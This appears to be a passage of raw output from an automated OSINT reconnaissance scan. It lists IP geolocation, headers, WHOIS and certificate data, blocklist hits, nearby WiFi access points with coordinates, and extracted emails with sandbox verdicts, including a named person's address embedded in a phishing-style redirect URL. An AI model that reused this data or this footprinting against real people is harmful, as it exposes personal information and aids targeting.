| 2023-05-12 02:45:54 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 4 | 0 | None | {u'city': u'Ashburn', u'security': {u'is_vpn': False}, u'city_geoname_id': 4744870, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'AMAZON-AES', u'isp_name': u'Amazon.com, Inc.', u'organization_name': u'Amazon Technologies Inc', u'autonomous_system_number': 14618}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20149', u'longitude': -77.4903, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:45:53'}, u'latitude': 39.0469, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2600:1f18:2489:8200::c8', u'continent': u'North America', u'region_iso_code': u'VA'} | 2600:1f18:2489:8200::c8 |
| 2023-05-12 02:59:50 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | asdf1234@calendar.google.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://privaterelay.appleid.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url6314.mail.nmacc.com/ls/click?upn=8UUcZfoU9ErRYP5rNGtgbirLN8xfc6bsTdjhpYE9O-2B6oIJCVLBVNxEMl4-2FlyZEXgpIcvOIsLdFwMmNMQ6pyipe-2BlH6ndePI6TegprE8-2FJ5TmwBSGqtoSQiQZMd1uQY0F6EMbvgZh-2FB54nRmur1hYZXb9DpD9Uaqar8AQBxXE9ZjEMEh9pj-2FNvjiSungY8Q-2BcGAEny7iKKiiOMOE4TVnhf8f7XNNG4vkRAhHBxDpFamm0IUZWV3z-2BlJLtiqNZocaeHRbn9q5OE4HMTBuJibaMxdHmJJ9cRGPg-2BIJz-2B-2F91yqQCKhq-2FDCeLChTKA7jVwK1Ouq-2FKIU-2FYhbkgDECGCTTIYKgHXPh2b3OYH9i7a6eI-2FAKkoa5wVpo9vtL32nYWta9ahz5vfUQqJE7rCOt9gGu6vQWShZJVtaDn-2FX0jLeh5IgiUHxe3oW8VqyzM8ypTZLDWj1E59I1JQ-2FktSv0rVnoCoiAb7P30xuBJWLqQ5lH4zPSwzQWh3Y6TkFHvj3cGgCyLHEq7_-2BOt3qy6nPPD-2BvPBT7bVtLrj9wxQ6PC4uiKPO00-2BGDcq4vCUL9jBCG2rzUktFCBBsWM9VDFDukFJsAvP5a2wlNm-2B1xvIYADajgidXgITH2clnmESRV-2BBkImikTYnjRiXwX9u5aj8UOixtxqSLd-2FknigE7ztnUTNb3Hm824FaNuRAjgM7w7tvQQ-2FLlxjpwO7cilXlMlvOUXGvEp4LRn9miTC4WQr-2FP80gqygKVr2Fvg-2F0JMdrNJ9JhF-2BavQqh-2F-2FWWK6tHbATUsKwjMalzZjASsgacGT9IwTW20bAz3NvT70G-2Be6bq15tVuvaeOKAiaoD-2B-2BGHYAAjoEMPIehIdac8BFr1v89Rh5h21H4kub2usLmqC3yC76UJPWE-2FAg-2FkbKljLX7rc5p70-2BTWNNS0fqLYZDnQPX9DQ4opuM2QB21j2WThAg-2Fa6lCRxasFq-2FKDHL-2BKRb', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a1c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a1c_IESQMMUTEX_0_519"\n "IsoScope_a1c_IESQMMUTEX_0_303"\n "IsoScope_a1c_ConnHashTable<2588>_HashTable_Mutex"\n "IsoScope_a1c_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2588"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a1c_IE_EarlyTabStart_0x9e8_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.56:80"\n "108.139.1.6:443"\n "116.50.97.93:443"\n "185.199.111.153:443"\n "142.251.46.174:443"\n "172.217.12.106:443"\n "18.155.181.57:443"\n "172.217.12.104:443"\n "142.250.191.42:443"\n "157.240.22.25:443"\n "142.251.214.130:443"\n "142.250.191.78:443"\n "142.250.191.66:443"\n "116.50.93.136:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url6314.mail.nmacc.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"nmacc.com"\n "pchen66.github.io"\n "tickets.jioworldcentre.com"\n "url6314.mail.nmacc.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"":signuphost:":"https://plus.google.com",ratingbadge:{url:"https://www.google.com/shopping/customerreviews/badge?usegapi=1"},appcirclepicker:{url:":socialhost:/:session_prefix:_/widget/render/appcirclepicker"},follow:{url:":socialhost:/:session_prefix:_/widget/render/follow?usegapi=1"},community:{url:":ctx_socialhost:/:session_prefix::im_prefix:_/widget/render/community?usegapi=1"},sharetoclassroom:{url:"https://classroom.google.com/sharewidget?usegapi=1"},ytshare:{params:{url:""},url:":socialhost:/:session_prefix:_/widget/render/ytshare?usegapi=1"}," (Indicator: "plus.google.com")\n "* [http://developers.facebook.com/policy/]. This copyright notice shall be" (Indicator: "facebook.com")\n "b,"vert.pix");break;case "PERCENT":Fy(d.verticalThresholds,b,"vert.pct")}Ev("sdl","init",!1)?Ev("sdl","pending",!1)||J(function(){return Gy()}):(Cv("sdl","init",!0),Cv("sdl","pending",!0),J(function(){Gy();if(Hy()){var e=Iy();qc(z,"scroll",e);qc(z,"resize",e)}else Cv("sdl","init",!1)}));return b}My.M="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ny=["www.youtube.com","www.youtube-nocookie.com"],Oy,Py=!1;" (Indicator: "youtube")\n "disableRealtimeCallback:!1,drive_share:{skipInitCommand:!0},csi:{rate:.01},client:{cors:!1},signInDeprecation:{rate:0},include_granted_scopes:!0,llang:"en",iframes:{youtube:{params:{location:["search","hash"]},url:":socialhost:/:session_prefix:_/widget/render/youtube?usegapi=1",methods:["scroll","openwindow"]},ytsubscribe:{url:"https://www.youtube.com/subscribe_embed?usegapi=1"},plus_circle:{params:{url:""},url:":socialhost:/:session_prefix::se:_/widget/plus/circle?usegapi=1"},plus_share:{params:{url:""}," (Indicator: "youtube")\n "function My(a,b){var c=this;return b}My.M="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ny=["www.youtube.com","www.youtube-nocookie.com"],Oy,Py=!1;" (Indicator: "youtube")\n "l=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gf:d,Ef:e,Ff:f,lg:g,mg:h,gd:l,Xa:b},p=z.YT,q=function(){Vy(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};J(function(){for(var t=H.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(Yy(w,"iframe_api")||Yy(w,"player_api"))return b}for(var x=H.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Py&&Wy(x[A],n.gd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")\n "person:{url:":socialhost:/:session_prefix:_/widget/render/person?usegapi=1"},savetodrive:{url:"https://drive.google.com/savetodrivebutton?usegapi=1",methods:["save"]},page:{url:":socialhost:/:session_prefix:_/widget/render/page?usegapi=1"},card:{url:":socialhost:/:session_prefix:_/hovercard/card"}}},h:"m;/_/scs/abc-static/_/js/k=gapi.lb.en.zUi2Oiqh0cQ.O/d=1/rs=AHpOoo-VnflFHGTzk3OsaVpWbqz0Ysb2Jw/m=__features__",u:"https://apis.google.com/js/api.js",hee:!0,dpo:!1,le:["scs"],glrp:false},platform:"backdrop blogger comments commentcount community donation family_creation follow hangout health page partnersbadge person playemm playreview plus plusone post ratingbadge savetoandroidpay savetodrive savetowallet sharetoclassroom shortlists signin2 surveyoptin visibility youtube ytsubscribe zoomableimage".split(" ")," (Indicator: "youtube")\n "Py=!0,b});return b}Zy.M="internal.enableAutoEventOnYouTubeActivity";var $y;function az(a){var b=!1;return b}az.M="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "transportUrl:b,context:c},R(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Hh.ia+"&cx=c";hs()&&(f+="&sign="+Hh.se);var g=Qh||Zh?gs(b,f):void 0;g||(g=So("https://","http://",Hh.Gd+f));Cl().destination[a]={state:1,context:c};mc(g)}};function is(){if(xl()){return!0}return!1};var ls=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),ms={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},ns={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var Yv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0,f=0;return{createEvent:function(g,h,l){var n=a(),p=n.Lf,q=void 0!==l?Math.round(l):void 0!==h?Math.round(n.Lf*h):Math.round(n.Uh),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=H.hidden?!1:.5<=Hk(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=Av(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "main.4a45304c_1_.js" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "api_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "QA70RK48.txt" has type "ASCII text"- Location: [%APPDATA%\\Mic |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 1 | 2 | 0 | None | 220-cp.keyubu.net ESMTP Exim 4.95 #2 Thu, 11 May 2023 06:41:45 +0300
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
| 87.248.157.102 |
| 2023-05-12 03:31:23 | Malicious IP on Same Subnet | Yes | blocklist.de | 0 | 0 | 4 | 0 | None | blocklist.de List [207.154.224.0/20]
http://lists.blocklist.de/lists/all.txt | 207.154.224.0/20 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.211): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5acc457cc32d9a-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | SpiceWorks (Category: tech)
https://community.spiceworks.com/people/ayhu | ayhu |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.7): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-origin-cache: HIT | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 02:54:10 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c570c285af722f3-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:10:14 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [172.67.160.0/20]
http://www.voipbl.org/update | 172.67.160.0/20 |
| 2023-05-12 02:54:41 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 396982 | 104.196.30.220 |
| 2023-05-12 02:45:43 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 185.199.109.153 |
| 2023-05-12 03:09:26 | Co-Hosted Site - Domain Whois | No | Whois | 2 | 0 | 4 | 0 | None | Domain Name: 001VIET.COM
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-10-01T07:27:47Z
Creation Date: 2022-03-31T20:18:54Z
Registry Expiry Date: 2024-03-31T20:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: 001viet.com
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-03-31T15:18:54Z
Creation Date: 2022-03-31T15:18:54Z
Registrar Registration Expiration Date: 2024-03-31T15:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
| 001viet.com |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Pastebin (Category: tech)
https://pastebin.com/u/login | login |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:55:9A:D5) | 52.3759, 4.8975 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | JIVE2.42025B0 (Net ID: 00:01:9F:20:25:B0) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:03:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:18:ae:06:7e:fc:0b:78:46:5c:8b:fe:1a:31:bf:5b:16:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 17:51:43 2022 GMT
Not After : Mar 13 17:51:42 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d2:a8:d4:9f:a9:bd:76:f3:4e:fa:75:b4:78:5e:
d8:6a:71:e4:f3:f9:c2:77:fe:f9:7d:4c:da:66:22:
e0:cd:34:b7:7c:8d:14:1c:4d:7d:46:bd:0d:78:0c:
dd:5b:c4:ff:9f:13:d1:36:82:30:3b:b9:24:f9:65:
eb:d4:82:59:47:e9:be:2d:ca:25:2b:a1:b5:27:87:
63:33:e8:be:3d:46:8c:9b:0f:9e:b7:28:4d:eb:79:
63:20:73:aa:a3:d5:3d:c6:2e:b7:9c:7f:e7:f8:96:
79:6d:51:52:62:f7:cc:65:ca:dd:5b:ef:27:c9:9c:
81:e6:4a:8c:e9:e1:99:cd:79:f8:60:4b:a5:6b:6f:
c9:a2:fa:cc:0c:e7:34:b2:77:b5:de:bd:fe:24:a9:
e6:e9:26:4a:54:ec:0f:53:69:fc:a9:cb:fb:84:2e:
7d:af:75:b6:15:ef:6d:e3:fb:23:27:72:c7:fd:a8:
77:78:c9:f6:5b:6f:b1:0a:09:7c:e3:91:c1:95:13:
b4:4a:b2:6f:b1:ab:4c:4d:0b:11:8c:fd:8d:fb:d9:
37:66:3b:07:7b:cc:19:50:a2:89:0c:ea:8d:f1:d1:
b3:36:06:ad:51:15:23:e4:0c:43:f6:cc:90:55:fa:
98:c8:81:54:f2:2f:f7:d0:0b:4f:9f:38:a8:6c:71:
67:c5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
46:DD:F2:80:57:6C:FD:50:6F:F3:DF:3E:F6:D6:F8:E4:B9:2D:C4:6F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
b3:28:33:86:e5:dc:4a:a5:0d:54:63:88:53:14:c5:02:19:6c:
52:0c:eb:6c:53:81:1e:79:fa:32:9b:67:92:47:04:43:5c:50:
0d:d4:24:6a:dc:a8:66:3f:6f:01:46:76:6d:ab:41:86:f7:8a:
9f:a9:30:88:c8:3c:39:d0:93:9d:c0:84:21:71:d0:ed:5b:fd:
37:f1:e5:b1:17:44:f1:5d:0d:e3:ee:59:71:ab:af:ea:49:a9:
6f:46:0a:b8:4f:fb:b3:90:f5:22:5b:f7:15:85:47:7f:49:6f:
40:88:be:87:42:31:e5:73:5b:21:63:86:05:bf:5e:c7:08:7b:
22:bd:7c:ea:3c:10:5d:31:48:93:7d:11:b0:63:57:aa:ac:8f:
0e:e2:79:b2:0b:1e:4c:22:c3:9b:30:05:63:91:46:7c:08:bc:
0b:a5:df:0d:fa:d4:f5:ca:11:e2:c3:e9:3b:84:63:2a:e1:83:
23:69:5a:17:9e:82:bd:3e:38:bf:2f:e0:e7:d8:8e:1f:89:ec:
98:5e:98:15:2d:6f:da:3d:c3:ff:6f:27:47:e4:75:ff:0f:27:
54:ce:7a:dc:ed:b7:3c:34:cb:a9:19:03:70:2a:f8:d1:db:82:
d5:fe:f6:78:e7:00:e6:9d:bd:26:7b:70:c5:8a:f4:85:0a:5c:
ca:c5:68:7d
|
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | " (Cloaked) (Net ID: 00:01:36:59:CB:CF) | 37.7813933,-122.3918002 |
| 2023-05-12 02:59:55 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | robert.scheubeck@vitesco.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fvitesco.com%2Frobert.scheubeck%40vitesco.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_86c_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_86c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_86c_IE_EarlyTabStart_0xb4c_Mutex"\n 